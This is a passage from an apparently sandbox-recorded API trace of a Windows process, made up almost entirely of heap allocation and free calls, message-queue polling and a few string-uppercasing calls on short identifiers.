lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.467] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.467] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.469] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.469] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.469] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.470] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.474] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0258.474] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa970 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0258.474] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.475] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.475] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.475] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0258.475] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0258.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.475] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.476] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.477] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.477] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0258.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0258.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 